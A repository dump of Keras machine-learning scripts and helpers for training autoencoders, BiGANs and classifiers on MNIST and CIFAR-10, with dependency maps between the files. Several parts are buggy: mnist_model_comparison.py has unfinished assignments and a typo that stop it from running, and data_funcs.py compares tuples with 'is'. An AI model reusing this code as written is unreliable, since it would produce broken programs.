"/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,471 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_lr_train.py | import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.optimizers import Adam
from functions.auxiliary_funcs import save_models
from functions.data_funcs import get_cifar10
from functions.visualization_funcs import save_reconstructions, plot_train_loss
from cifar10_models import deterministic_encoder_model, generator_model
from common_models.common_models import latent_reconstructor_model
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
image_path = 'Images/cifar10_lr'
model_path = 'Models/cifar10_lr'
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()
z_train = np.random.normal(size=(X_train.shape[0], latent_dim))
z_test = np.random.normal(size=(X_test.shape[0], latent_dim))
# =====================================
# Instantiate and compile models
# =====================================
# Instanstiate models
encoder = deterministic_encoder_model()
generator = generator_model()
generator.load_weights('Models/cifar10_bigan_determ_generator.h5')
generator.trainable = False
latent_regressor = latent_reconstructor_model(generator, encoder)
# Specify optimizer
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)
# Compile latent regressor
latent_regressor.compile(optimizer=optimizer, loss='mse')
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 100
batch_size = 128
patience = 5
# Specify training stopping criterion
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = latent_regressor.fit(z_train, z_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_data=(z_test, z_test),
callbacks=callbacks,
verbose=1)
# Replace current encoder and decoder models with that from the saved best autoencoder
decoder = generator_model()
encoder = deterministic_encoder_model()
latent_reconstructor = latent_reconstructor_model(decoder, encoder)
latent_reconstructor.load_weights(model_path + '.h5')
# Save encoder weights
save_models(path=model_path, encoder=encoder)
# =====================================
# Visualization
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Plot training curves
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,472 | davidhayes3/ME-Project | refs/heads/master | /functions/data_funcs.py | import numpy as np
from keras.datasets import mnist, cifar10, cifar100
# Function to rescale images
def rescale_image(image, image_range=(0,1)):
if image_range is (0,1):
image *= 255
elif image_range is (-1,1):
image = 127.5 * image + 127.5
return image
# Function to pre-process data
def preprocess_data(data, gan=False, color=False):
if gan is False:
data = data.astype(np.float32) / 255.
elif gan is True:
data = (data.astype(np.float32) - 127.5) / 127.5
else:
print('Incorrect range of values requested')
if color is not True:
data = np.expand_dims(data, axis=3)
return data
# Function to load and pre-process MNIST dataset
def get_mnist(gan=False):
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = preprocess_data(X_train, gan)
X_test = preprocess_data(X_test, gan)
return (X_train, y_train), (X_test, y_test)
# Function to load and pre-process CIFAR10 dataset
def get_cifar10(gan=False):
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
X_train = preprocess_data(X_train, gan, color=True)
X_test = preprocess_data(X_test, gan, color=True)
return (X_train, y_train), (X_test, y_test)
# Function to load and pre-process CIFAR100 dataset
def get_cifar100(range=(0,1)):
(X_train, y_train), (X_test, y_test) = cifar100.load_data()
X_train = preprocess_data(X_train, range)
X_test = preprocess_data(X_test, range)
return (X_train, y_train), (X_test, y_test) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,473 | davidhayes3/ME-Project | refs/heads/master | /functions/visualization_funcs.py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
import math
import matplotlib.gridspec as gridspec
# Function to plot training loss curves
def plot_train_accuracy(path, history):
plt.figure()
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Model Accuracy')
plt.ylabel('Accuracy (%)')
plt.xlabel('Epoch')
plt.legend(['Train', 'Validation'], loc='lower right')
plt.savefig(path + '_train_acc.png')
plt.show()
# Function to plot training accuracy curves
def plot_train_loss(path, history):
plt.figure()
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Validation'], loc='upper right')
plt.savefig(path + '_train_loss.png')
plt.show()
# Function to plot batch loss curves for generator and discriminator loss
def plot_gan_batch_loss(path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory):
plt.figure()
batch_numbers = np.arange((epochs * num_batches)) + 1
plt.plot(batch_numbers, d_batch_loss_trajectory, 'b-', batch_numbers, g_batch_loss_trajectory, 'r-')
plt.legend(['Discriminator', 'Generator'], loc='upper right')
plt.xlabel('Batch Number')
plt.ylabel('Loss')
plt.savefig(path + '_batchloss.png')
plt.show()
# Function to plot epoch loss curves for g and d
def plot_gan_epoch_loss(path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory):
plt.figure()
epoch_numbers = np.arange(epochs) + 1
plt.plot(epoch_numbers, d_epoch_loss_trajectory, 'b-', epoch_numbers, g_epoch_loss_trajectory, 'r-')
plt.legend(['Discriminator', 'Generator'], loc='upper right')
plt.xlabel('Epoch Number')
plt.ylabel('Average Minibatch Loss')
plt.savefig(path + '_epochloss.png')
# Function to plot discriminator accuracy over epochs
def plot_discriminator_acc(path, epochs, d_acc_trajectory):
plt.figure()
epoch_numbers = np.arange(epochs) + 1
plt.plot(epoch_numbers, d_acc_trajectory)
plt.xlabel('Epoch Number')
plt.ylabel('Accuracy')
plt.savefig(path + '_discriminator_acc.png')
# Function to plot reconstructions of test set examples
def save_reconstructions(path, num_classes, test_data, test_labels, generator, encoder, img_rows, img_cols, channels,
color=True, num_recons_per_class=10):
# Get initial data examples to train on
classes = np.arange(num_classes)
test_digit_indices = np.empty(0)
# Modify training set to contain set number of labels for each class
for class_index in range(num_classes):
# Generate training set with even class distribution over all labels
indices = [i for i, y in enumerate(test_labels) if y == classes[class_index]]
indices = np.asarray(indices)
indices = indices[0:num_recons_per_class]
test_digit_indices = np.concatenate((test_digit_indices, indices))
test_digit_indices = test_digit_indices.astype(np.int)
# Generate test and reconstructed digit arrays
X_test = test_data[test_digit_indices]
recon_x = generator.predict(encoder.predict(X_test))
num_rows = num_classes
num_cols = num_recons_per_class
plt.figure(figsize=(num_rows, num_cols))
gs = gridspec.GridSpec(num_rows, num_cols, width_ratios=num_recons_per_class*[1],
wspace=0., hspace=0., top=0.8, bottom=0.2, left=0.2, right=0.8)
for i in range(num_rows):
for j in range(num_cols):
if color is True:
im = recon_x[i * num_cols + j].reshape(img_rows, img_cols, channels)
if color is False:
im = recon_x[i * num_cols + j].reshape(img_rows, img_cols)
plt.gray()
ax = plt.subplot(gs[i, j])
plt.imshow(im)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.savefig(path + '_recons.png')
# Function to save images
def save_imgs(path, gen_imgs, epoch, img_rows, img_cols, channels, color=True):
r, c = 5, 5
fig, axs = plt.subplots(r, c)
count = 0
for i in range(r):
for j in range(c):
if color is True:
axs[i, j].imshow(gen_imgs[count].reshape(img_rows, img_cols, channels))
elif color is False:
axs[i, j].imshow(gen_imgs[count].reshape(img_rows, img_cols), cmap='gray')
axs[i, j].axis('off')
count += 1
fig.savefig(path + '_gen_%d.png' % (epoch))
plt.close()
# Function to plot 2D latent space visualizations
def save_latent_vis(path, data, labels, encoder, num_classes, epoch=None):
z = encoder.predict(data)
fig = plt.figure()
ax = fig.add_subplot(111)
colors = cm.Spectral(np.linspace(0, 1, num_classes))
xx = z[:,0]
yy = z[:,1]
# Plot 2D data points
for i in range(num_classes):
ax.scatter(xx[labels == i], yy[labels == i], color=colors[i], label=i, s=5)
plt.axis('tight')
if epoch is None:
plt.savefig(path + '_latent_vis.png')
elif epoch is not None:
plt.savefig(path + '_latent_vis_%d.png' % (epoch + 1))
plt.close() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,474 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_model_comparison.py | import keras
from keras import backend as K
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from mnist_conv_ae_models import *
from keras.callbacks import EarlyStopping, ModelCheckpoint
# Set random seed for reproducibility
np.random.seed(1330)
## Load and preprocess data
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1))
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1))
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)
## Define models
# Load encoders
mlp_ae = encoder_model()
onv_ae = encoder_model()
mlp_vae = encoder_model()
conv_vae = encoder_model()
mlp_bigan = encoder_model()
conv_bigan =
conv_latent_regressor =
encoders = (mlp_ae, conv_ae, mlp_vae, conv_vae, mlp_bigan, conv_bigan, conv_latent_regressor)
for encoder in encoders:
encoder.load_weights(str(encoder) + '_encoder.h5')
encoder.trainable = False
# Load frozen pretrained encoder model
pretrained_e_frozen = encoder_model()
pretrained_e_frozen.load_weights('encoder.h5')
pretrained_e_frozen.trainable = False
# Hyperparameters and training specification for both models
epochs = 100
batch_size = 100
val_split = 1 / 5.
# Specify training stop criterion and when to save model weights
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto')
# Number of labelled examples to investigate
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 60000]
num_iterations = 5
# Arrays to hold accuracy of classifiers
classifier_pretrained_frozen_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_trainable_acc = np.zeros(len(num_unlabelled))
classifier_random_acc = np.zeros(len(num_unlabelled))
# Loop through each quantity of enquiry
for index, num in enumerate(num_unlabelled):
# Set each score to zero
pretrained_frozen_score = 0
pretrained_trainable_score = 0
random_score = 0
# Reduce size of training sets
reduced_x_train = x_train[0:num, :, :, :]
reduced_y_train = y_train_one_hot[0:num, :]
# Average classification accuracy over num_iterations readings
for iteration in range(num_iterations):
# Print details of no. of labelled examples and iteration number
print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(iteration+1) + '/' + str(num_iterations))
## Initialize classifiers
# Classifier with e learned from autoencoder and frozen
mnist_classifier_pretrained_e_frozen = classifier_e_frozen_model(pretrained_e_frozen)
# Classifier with e learned from autoencoder and not frozen
pretrained_e_trainable = encoder_model()
pretrained_e_trainable.load_weights('encoder.h5')
mnist_classifier_pretrained_e_trainable = classifier_e_trainable_model(pretrained_e_trainable)
# Classifier with randomly initialized e
random_e = encoder_model()
mnist_classifier_random_e = classifier_e_trainable_model(random_e)
# Print details of trainable and non-trainable weights of models
if index == 0 and iteration == 0:
# Print number of trainable and non-trainable parameters for each classifier
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_frozen.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_frozen.non_trainable_weights)]))
print('Classifier w/ Frozen Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable paramseter: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_trainable.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_trainable.non_trainable_weights)]))
print('\nClassifier w/ Trainable Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable paramseter: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.non_trainable_weights)]))
print('\nClassifier w/ Random Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable paramseter: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
# Compile models
mnist_classifier_pretrained_e_frozen.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
mnist_classifier_pretrained_e_trainable.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
mnist_classifier_random_e.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
## Train models and save test accuracy
# Train classifier with frozen pretrained encoder
model_checkpoint = ModelCheckpoint('classifier_1.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
mnist_classifier_pretrained_e_frozen.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
mnist_classifier_pretrained_e_frozen.load_weights('classifier_1.h5')
score = mnist_classifier_pretrained_e_frozen.evaluate(x_test, y_test_one_hot, verbose=0)
pretrained_frozen_score += score[1]
# Train classifier with trainable pretrained encoder
model_checkpoint = ModelCheckpoint('classifier_2.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
mnist_classifier_pretrained_e_trainable.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
validation_split=val_split)
mnist_classifier_pretrained_e_trainable.load_weights('classifier_2.h5')
score = mnist_classifier_pretrained_e_trainable.evaluate(x_test, y_test_one_hot, verbose=0)
pretrained_trainable_score += score[1]
# Train classifier with randomly initialized encoder
model_checkpoint = ModelCheckpoint('classifier_3.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
mnist_classifier_random_e.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
validation_split=val_split)
mnist_classifier_random_e.load_weights('classifier_3.h5')
score = mnist_classifier_random_e.evaluate(x_test, y_test_one_hot, verbose=0)
random_score += score[1]
# Record average classification accuracy for each no. of labelled examples
classifier_pretrained_frozen_acc[index] = 100 * pretrained_frozen_score / num_iterations
classifier_pretrained_trainable_acc[index] = 100 * pretrained_trainable_score / num_iterations
classifier_random_acc[index] = 100 * random_score / num_iterations
# Print accuracies of classifiers on full training set
print("Classifer Accuracies\n")
print("Frozen Pretrained Encoder + FC Layers: " + str(classifier_pretrained_frozen_acc[-1]) + "%")
print("Trainable Pretrained Encoder + FC Layers: " + str(classifier_pretrained_trainable_acc[-1]) + "%")
print("Randomly Initialized Encoder + FC Layers: " + str(classifier_random_acc[-1]) + "%")
## Plot results
# Plot comparison graph
plt.plot(num_unlabelled, classifier_pretrained_frozen_acc, '-o', num_unlabelled, classifier_pretrained_trainable_acc,
'-o', num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['Frozen Pretrained Encoder', 'Trainable Pretrained Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.savefig('Images/mnist_classifier_num_labels_compar.png')
plt.show()
# Plot for frozen pretrained network
plt.plot(num_unlabelled, classifier_pretrained_frozen_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Frozen Pretrained E')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.show()
# Plot for trainable pretrained network
plt.plot(num_unlabelled, classifier_pretrained_trainable_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Trainable Pretrained E)')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.show()
# Plot for supervised network
plt.plot(num_unlabelled, classifier_random_acc, '-o')
plt.title('Test Accuracy vs No. of Labelled Examples used for Training (Random E')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.grid()
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", 